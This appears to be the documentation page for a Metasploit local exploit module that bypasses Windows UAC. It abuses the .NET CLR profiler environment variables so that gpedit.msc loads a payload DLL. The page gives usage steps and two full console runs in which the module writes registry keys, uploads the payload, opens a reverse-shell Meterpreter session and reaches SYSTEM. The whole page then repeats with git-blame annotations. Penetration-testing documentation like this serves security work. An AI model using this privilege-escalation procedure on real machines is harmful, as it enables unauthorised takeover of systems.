documentation/modules/exploit/windows/local/bypassuac_dotnet_profiler.md

## Introduction

Microsoft Windows allows for the automatic loading of a profiling COM object during
the launch of a CLR process based on certain environment variables ostensibly to
monitor execution.  In this case, we abuse the profiler by pointing to a payload DLL
that will be launched as the profiling thread.  This thread will run at the permission
level of the calling process, so an auto-elevating process will launch the DLL with
elevated permissions.  In this case, we use gpedit.msc as the auto-elevated CLR
process, but others would work, too.

## Usage

1. Create a session on the target system under the context of a local administrative user.
2. Begin interacting with the module: `use exploit/windows/local/bypassuac_dotnet_profiler`.
3. Set the `PAYLOAD` and configure it correctly.
4. If an existing handler is configured to receive the elevated session, then the module's
   handler should be disabled: `set DisablePayloadHandler true`.
5. Make sure that the `SESSION` value is set to the existing session identifier.
6. Invoke the module: `run`.

## Scenarios

### Windows Windows 7 (6.1 Build 7601, Service Pack 1) x64

```
msf5 exploit(windows/local/bypassuac_dotnet_profiler) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] win_dir = C:\Windows
[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
[*] exploit_dir = C:\Windows\System32\
[*] target_filepath = C:\Windows\System32\gpedit.msc
[*] Making Payload
[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\vehxxpkdx.dll
[*] UUID = a47dbe47-41a6-42ed-95a0-e2cc4710a75a
[*] Writing  to HKCU\Software\Classes\CLSID\{a47dbe47-41a6-42ed-95a0-e2cc4710a75a}\InprocServer32
[*] Writing COR_PROFILER to HKCU\Environment
[*] Writing COR_ENABLE_PROFILING to HKCU\Environment
[*] Writing COR_PROFILER_PATH to HKCU\Environment
[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\vehxxpkdx.dll
[*] Payload Upload Complete
[*] Launching C:\Windows\System32\gpedit.msc
[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\vehxxpkdx.dll!
[*] Please wait for session and cleanup....
[*] Sending stage (206403 bytes) to 192.168.132.187
[*] Meterpreter session 5 opened (192.168.135.168:4444 -> 192.168.132.187:49234) at 2019-11-15 12:14:41 -0600
[*] Removing Registry Changes
[*] Deleting HKCU\Software\Classes\CLSID\{a47dbe47-41a6-42ed-95a0-e2cc4710a75a}\InprocServer32 key
[*] Deleting COR_PROFILER from HKCU\Environment key
[*] Deleting COR_ENABLE_PROFILING from HKCU\Environment key
[*] Deleting COR_PROFILER_PATH from HKCU\Environment key
[*] Registry Changes Removed

meterpreter > sysinfo
Computer        : WIN7X64-SP1
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN7X64-SP1\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

```

### Windows Windows 7 (6.1 Build 7601, Service Pack 1) x64
```
msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac_dotnet_profiler 
msf5 exploit(windows/local/bypassuac_dotnet_profiler) > set session 6
session => 6
msf5 exploit(windows/local/bypassuac_dotnet_profiler) > show options

Module options (exploit/windows/local/bypassuac_dotnet_profiler):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PAYLOAD_NAME                   no        The filename to use for the payload binary (%RAND% by default).
   SESSION       6                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64


msf5 exploit(windows/local/bypassuac_dotnet_profiler) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] win_dir = C:\Windows
[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
[*] exploit_dir = C:\Windows\System32\
[*] target_filepath = C:\Windows\System32\gpedit.msc
[*] Making Payload
[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\LNpAorHj.dll
[*] UUID = d472ba96-3dfc-432c-8ad2-f44ada2a39ec
[*] Writing COR_PROFILER to HKCU\Environment
[*] Writing COR_ENABLE_PROFILING to HKCU\Environment
[*] Writing COR_PROFILER_PATH to HKCU\Environment
[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\LNpAorHj.dll
[*] Payload Upload Complete
[*] Launching C:\Windows\System32\gpedit.msc
[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\LNpAorHj.dll!
[*] Please wait for session and cleanup....
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 7 opened (192.168.135.168:4444 -> 192.168.132.125:49683) at 2019-11-15 12:18:54 -0600
[*] Removing Registry Changes
[*] Deleting COR_PROFILER from HKCU\Environment key
[*] Deleting COR_ENABLE_PROFILING from HKCU\Environment key
[*] Deleting COR_PROFILER_PATH from HKCU\Environment key
[*] Registry Changes Removed

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

```
Fix up required reg additions for different windows versions 2019-11-15 12:20:50 -06:00			`## Introduction`

			`Microsoft Windows allows for the automatic loading of a profiling COM object during`
			`the launch of a CLR process based on certain environment variables ostensibly to`
			`monitor execution. In this case, we abuse the profiler by pointing to a payload DLL`
			`that will be launched as the profiling thread. This thread will run at the permission`
			`level of the calling process, so an auto-elevating process will launch the DLL with`
			`elevated permissions. In this case, we use gpedit.msc as the auto-elevated CLR`
			`process, but others would work, too.`

			`## Usage`

			`1. Create a session on the target system under the context of a local administrative user.`
			2. Begin interacting with the module: `use exploit/windows/local/bypassuac_dotnet_profiler`.
			3. Set the `PAYLOAD` and configure it correctly.
			`4. If an existing handler is configured to receive the elevated session, then the module's`
			handler should be disabled: `set DisablePayloadHandler true`.
			5. Make sure that the `SESSION` value is set to the existing session identifier.
			6. Invoke the module: `run`.

scenario to scenarios 2020-01-16 10:36:38 -05:00			`## Scenarios`
Fix up required reg additions for different windows versions 2019-11-15 12:20:50 -06:00
			`### Windows Windows 7 (6.1 Build 7601, Service Pack 1) x64`

			```
			`msf5 exploit(windows/local/bypassuac_dotnet_profiler) > run`

			`[*] Started reverse TCP handler on 192.168.135.168:4444`
			`[*] UAC is Enabled, checking level...`
			`[*] Checking admin status...`
			`[+] Part of Administrators group! Continuing...`
			`[+] UAC is set to Default`
			`[+] BypassUAC can bypass this setting, continuing...`
			`[*] win_dir = C:\Windows`
			`[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp`
			`[*] exploit_dir = C:\Windows\System32\`
			`[*] target_filepath = C:\Windows\System32\gpedit.msc`
			`[*] Making Payload`
			`[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\vehxxpkdx.dll`
			`[*] UUID = a47dbe47-41a6-42ed-95a0-e2cc4710a75a`
			`[*] Writing to HKCU\Software\Classes\CLSID\{a47dbe47-41a6-42ed-95a0-e2cc4710a75a}\InprocServer32`
			`[*] Writing COR_PROFILER to HKCU\Environment`
			`[*] Writing COR_ENABLE_PROFILING to HKCU\Environment`
			`[*] Writing COR_PROFILER_PATH to HKCU\Environment`
			`[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\vehxxpkdx.dll`
			`[*] Payload Upload Complete`
			`[*] Launching C:\Windows\System32\gpedit.msc`
			`[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\vehxxpkdx.dll!`
			`[*] Please wait for session and cleanup....`
			`[*] Sending stage (206403 bytes) to 192.168.132.187`
			`[*] Meterpreter session 5 opened (192.168.135.168:4444 -> 192.168.132.187:49234) at 2019-11-15 12:14:41 -0600`
			`[*] Removing Registry Changes`
			`[*] Deleting HKCU\Software\Classes\CLSID\{a47dbe47-41a6-42ed-95a0-e2cc4710a75a}\InprocServer32 key`
			`[*] Deleting COR_PROFILER from HKCU\Environment key`
			`[*] Deleting COR_ENABLE_PROFILING from HKCU\Environment key`
			`[*] Deleting COR_PROFILER_PATH from HKCU\Environment key`
			`[*] Registry Changes Removed`

			`meterpreter > sysinfo`
			`Computer : WIN7X64-SP1`
			`OS : Windows 7 (6.1 Build 7601, Service Pack 1).`
			`Architecture : x64`
			`System Language : en_US`
			`Domain : WORKGROUP`
			`Logged On Users : 2`
			`Meterpreter : x64/windows`
			`meterpreter > getuid`
			`Server username: WIN7X64-SP1\msfuser`
			`meterpreter > getsystem`
			`...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).`
			`meterpreter > getuid`
			`Server username: NT AUTHORITY\SYSTEM`
			`meterpreter >`

			```

			`### Windows Windows 7 (6.1 Build 7601, Service Pack 1) x64`
			```
			`msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac_dotnet_profiler`
			`msf5 exploit(windows/local/bypassuac_dotnet_profiler) > set session 6`
			`session => 6`
			`msf5 exploit(windows/local/bypassuac_dotnet_profiler) > show options`

			`Module options (exploit/windows/local/bypassuac_dotnet_profiler):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`PAYLOAD_NAME no The filename to use for the payload binary (%RAND% by default).`
			`SESSION 6 yes The session to run this module on.`


			`Payload options (windows/x64/meterpreter/reverse_tcp):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)`
			`LHOST 192.168.135.168 yes The listen address (an interface may be specified)`
			`LPORT 4444 yes The listen port`


			`Exploit target:`

			`Id Name`
			`-- ----`
			`0 Windows x64`


			`msf5 exploit(windows/local/bypassuac_dotnet_profiler) > run`

			`[*] Started reverse TCP handler on 192.168.135.168:4444`
			`[*] UAC is Enabled, checking level...`
			`[*] Checking admin status...`
			`[+] Part of Administrators group! Continuing...`
			`[+] UAC is set to Default`
			`[+] BypassUAC can bypass this setting, continuing...`
			`[*] win_dir = C:\Windows`
			`[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp`
			`[*] exploit_dir = C:\Windows\System32\`
			`[*] target_filepath = C:\Windows\System32\gpedit.msc`
			`[*] Making Payload`
			`[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\LNpAorHj.dll`
			`[*] UUID = d472ba96-3dfc-432c-8ad2-f44ada2a39ec`
			`[*] Writing COR_PROFILER to HKCU\Environment`
			`[*] Writing COR_ENABLE_PROFILING to HKCU\Environment`
			`[*] Writing COR_PROFILER_PATH to HKCU\Environment`
			`[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\LNpAorHj.dll`
			`[*] Payload Upload Complete`
			`[*] Launching C:\Windows\System32\gpedit.msc`
			`[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\LNpAorHj.dll!`
			`[*] Please wait for session and cleanup....`
			`[*] Sending stage (206403 bytes) to 192.168.132.125`
			`[*] Meterpreter session 7 opened (192.168.135.168:4444 -> 192.168.132.125:49683) at 2019-11-15 12:18:54 -0600`
			`[*] Removing Registry Changes`
			`[*] Deleting COR_PROFILER from HKCU\Environment key`
			`[*] Deleting COR_ENABLE_PROFILING from HKCU\Environment key`
			`[*] Deleting COR_PROFILER_PATH from HKCU\Environment key`
			`[*] Registry Changes Removed`

			`meterpreter > sysinfo`
			`Computer : DESKTOP-D1E425Q`
			`OS : Windows 10 (10.0 Build 17134).`
			`Architecture : x64`
			`System Language : en_US`
			`Domain : WORKGROUP`
			`Logged On Users : 2`
			`Meterpreter : x64/windows`
			`meterpreter > getuid`
			`Server username: DESKTOP-D1E425Q\msfuser`
			`meterpreter > getsystem`
			`...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).`
			`meterpreter > getuid`
			`Server username: NT AUTHORITY\SYSTEM`
			`meterpreter >`

			```